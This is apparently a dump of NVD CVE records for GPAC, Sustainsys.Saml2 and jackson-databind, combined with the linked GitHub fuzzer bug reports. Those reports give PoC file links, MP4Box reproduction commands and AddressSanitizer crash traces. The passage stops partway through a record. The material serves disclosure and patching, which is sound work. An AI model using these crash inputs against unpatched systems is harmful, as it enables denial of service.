{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1264" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1264" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1264
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master) due to a heap buffer overflow on function gf_m2ts_process_pmt. PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_hbo_gf_m2ts_process_pmt Command: MP4Box -info $PoC ASAN says: ~~~ ==19178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b000009add at pc 0x0000009816a6 bp 0x7ffd918f74c0 sp 0x7ffd918f74b0 READ of size 1 at 0x60b000009add thread T0 #0 0x9816a5 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2372 #1 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #2 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #3 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #4 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #5 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #6 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #7 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #8 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #9 0x7f2f14c6782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV (heap-buffer-overflow) on gf_m2ts_process_pmt
https://api.github.com/repos/gpac/gpac/issues/1264/comments
1
2019-07-05T22:57:04Z
2019-07-07T15:57:21Z
https://github.com/gpac/gpac/issues/1264
464,791,707
1,264
1,131
CVE-2019-20630
2020-03-24T19:15:21.070
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a heap-based buffer over-read in BS_ReadByte (called from gf_bs_read_bit) in utils/bitstream.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1268" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1268" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1268
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a buffer overflow on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_hbo_BS_ReadByte Command: MP4Box -info $PoC ASAN says: ~~~ ==27934==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000a236 at pc 0x00000047c2aa bp 0x7ffded5429d0 sp 0x7ffded5429c0 READ of size 1 at 0x60b00000a236 thread T0 #0 0x47c2a9 in BS_ReadByte /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:253 #1 0x47c2a9 in gf_bs_read_bit /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:287 #2 0x47ecc7 in gf_bs_read_double /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:444 #3 0x85122d in gf_odf_read_mediatime /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:1471 #4 0x8412bb in gf_odf_parse_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/descriptors.c:159 #5 0x84b027 in gf_odf_read_iod /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:505 #6 0x8412bb in gf_odf_parse_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/descriptors.c:159 #7 0x9808b0 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2179 #8 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #9 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #10 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #11 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #12 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #13 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #14 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #15 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #16 0x7fe2e64fa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
heap-buffer-overflow on BS_ReadByte
https://api.github.com/repos/gpac/gpac/issues/1268/comments
1
2019-07-06T00:10:13Z
2019-07-07T15:59:28Z
https://github.com/gpac/gpac/issues/1268
464,799,415
1,268
1,132
CVE-2019-20631
2020-03-24T19:15:21.133
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid pointer dereference in gf_list_count in utils/list.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1270" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1270" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "763" ]
763
https://github.com/gpac/gpac/issues/1270
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_list_count Command: MP4Box -info $PoC ASAN says: ~~~ ==19963==ERROR: AddressSanitizer: SEGV on unknown address 0x00047fff8001 (pc 0x00000047a43d bp 0x60800000bfa0 sp 0x7ffe5b9765b0 T0) #0 0x47a43c in gf_list_count /home/dungnguyen/gueb-testing/gpac-head/src/utils/list.c:641 #1 0x9809d4 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2185 #2 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #3 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #4 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #5 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #6 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #7 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #8 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #9 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #10 0x7ff2747fe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV on unknown address on gf_list_count
https://api.github.com/repos/gpac/gpac/issues/1270/comments
1
2019-07-06T00:11:01Z
2019-07-07T16:00:40Z
https://github.com/gpac/gpac/issues/1270
464,799,484
1,270
1,133
CVE-2019-20632
2020-03-24T19:15:21.180
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid pointer dereference in gf_odf_delete_descriptor in odf/desc_private.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1271" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1271" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "763" ]
763
https://github.com/gpac/gpac/issues/1271
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_odf_delete_descriptor Command: MP4Box -diso $PoC ASAN says: ~~~ ==26490==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000ff00 (pc 0x000000c3ef6d bp 0x60800000bfa0 sp 0x7fffe837bf90 T0) #0 0xc3ef6c in gf_odf_delete_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/desc_private.c:164 #1 0x848f20 in gf_odf_del_esd /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:156 #2 0x980a2e in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2186 #3 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #4 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #5 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #6 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #7 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #8 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #9 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #10 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #11 0x7f94de37a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV on unknown addres on gf_odf_delete_descriptor
https://api.github.com/repos/gpac/gpac/issues/1271/comments
1
2019-07-06T00:25:31Z
2019-07-07T16:01:07Z
https://github.com/gpac/gpac/issues/1271
464,800,676
1,271
1,134
CVE-2020-5261
2020-03-25T02:15:11.427
Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) greater than 2.0.0, and less than version 2.5.0 has a faulty implementation of Token Replay Detection. Token Replay Detection is an important defence in depth measure for Single Sign On solutions. The 2.5.0 version is patched. Note that version 1.0.1 is not affected. It has a correct Token Replay Implementation and is safe to use. Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) greater than 2.0.0, and less than version 2.5.0 have a faulty implementation of Token Replay Detection. Token Replay Detection is an important defense measure for Single Sign On solutions. The 2.5.0 version is patched. Note that version 1.0.1 and prior versions are not affected. These versions have a correct Token Replay Implementation and are safe to use.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.8, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/commit/e58e0a1aff2b1ead6aca080b7cdced55ee6d5241" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/issues/711" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/security/advisories/GHSA-g6j2-ch25-5mmv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/commit/e58e0a1aff2b1ead6aca080b7cdced55ee6d5241" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/issues/711" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Sustainsys/Saml2/security/advisories/GHSA-g6j2-ch25-5mmv" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sustainsys:saml2:*:*:*:*:*:*:*:*", "matchCriteriaId": "74E6577A-B61E-43AD-BE8E-CC0CAC83C4F2", "versionEndExcluding": "2.5.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "294" ]
294
https://github.com/Sustainsys/Saml2/issues/711
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Sustainsys", "Saml2" ]
Token Replay detection was not properly implemented in the migration to .Net Core. The security implications are described in: https://github.com/Sustainsys/Saml2/security/advisories/GHSA-g6j2-ch25-5mmv and published as CVE-2020-5261
Missing Token Replay Detection in 2.X
https://api.github.com/repos/Sustainsys/Saml2/issues/711/comments
0
2017-05-09T17:07:47Z
2020-04-22T08:46:37Z
https://github.com/Sustainsys/Saml2/issues/711
227,434,852
711
1,135
CVE-2020-10968
2020-03-26T13:15:12.970
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2662" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2662" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, 